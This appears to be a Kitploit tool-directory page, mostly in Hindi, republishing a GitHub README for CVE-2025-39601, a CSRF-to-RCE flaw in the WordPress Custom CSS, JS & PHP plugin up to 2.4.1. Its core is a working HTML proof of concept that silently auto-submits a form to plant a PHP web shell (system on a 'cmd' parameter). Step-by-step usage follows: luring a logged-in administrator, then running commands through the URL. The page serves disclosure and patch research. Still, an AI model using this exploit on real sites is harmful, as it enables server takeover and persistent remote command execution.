Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-39601 — WordPress कस्टम CSS, JS & PHP प्लगइन <= 2.4.1 - CSRF से RCE कमज़ोरी | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-39601
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-39601

CVE-2025-39601

WordPress कस्टम CSS, JS & PHP प्लगइन <= 2.4.1 - CSRF से RCE कमज़ोरी

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2025-39601 - वर्डप्रेस कस्टम CSS, JS और PHP प्लगइन में CSRF से RCE <= 2.4.1

🧠 विवरण

WPFactory कस्टम CSS, JS और PHP प्लगइन में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) कमज़ोरी अनधिकृत POST अनुरोधों के माध्यम से दुर्भावनापूर्ण PHP कोड इंजेक्ट करके रिमोट कोड एक्ज़ीक्यूशन (RCE) की अनुमति देती है।
यह संस्करण 2.4.1 तक और उसे शामिल करते हुए सभी संस्करणों को प्रभावित करता है।

  • CVE आईडी: CVE-2025-39601
  • प्रकाशित: 2025-04-16
  • अपडेटेड: 2025-04-16
  • गंभीरता: 🔥 9.6 (गंभीर)
  • CWE: CWE-352 - क्रॉस-साइट रिक्वेस्ट फोर्जरी
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🖼️ दृश्य प्रमाण

नीचे एक स्क्रीनशॉट है जो सफल शोषण का परिणाम दिखाता है, यह प्रदर्शित करता है कि URL पैरामीटर के माध्यम से रिमोट कोड कैसे निष्पादित किया जा सकता है:

Nxploited


Nxploited


💥 प्रूफ ऑफ कॉन्सेप्ट (PoC)

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
    <h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
    <p>By : Nxploited | Khaled Alenazi</p>
    <form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
        <input type="hidden" name="alg_custom_css_php_enabled" value="1">
        <input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
        <input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
        <input type="hidden" name="alg_ccjp_submit" value="php">
        <noscript><input type="submit" value="Submit"></noscript>
    </form>
</body>
</html>

🧪 उपयोग

  1. उपरोक्त HTML फ़ाइल को किसी भी बाहरी सर्वर या स्थानीय वातावरण पर होस्ट करें।
  2. जब कोई एडमिन उपयोगकर्ता लॉग इन हो, तो उस ब्राउज़र में होस्ट की गई HTML फ़ाइल पर जाएँ।
  3. यह फ़ॉर्म को चुपचाप सबमिट करेगा और प्लगइन की सेटिंग्स में PHP कोड इंजेक्ट करेगा।
  4. plugins_loaded हुक के माध्यम से यह कोड हर पेज लोड पर स्वचालित रूप से निष्पादित हो जाता है।
  5. उदाहरण निष्पादन:
    root@kitploit:~
    http://target-site.com/?cmd=whoami
    

⚠️ अस्वीकरण

यह PoC केवल शैक्षिक उद्देश्यों के लिए है।
इस जानकारी के अनुचित उपयोग से होने वाली किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।
हमेशा नियंत्रित वातावरण में और अनुमति के साथ परीक्षण करें।


द्वारा: Nxploited | Khaled Alenazi

टूल डाउनलोड करें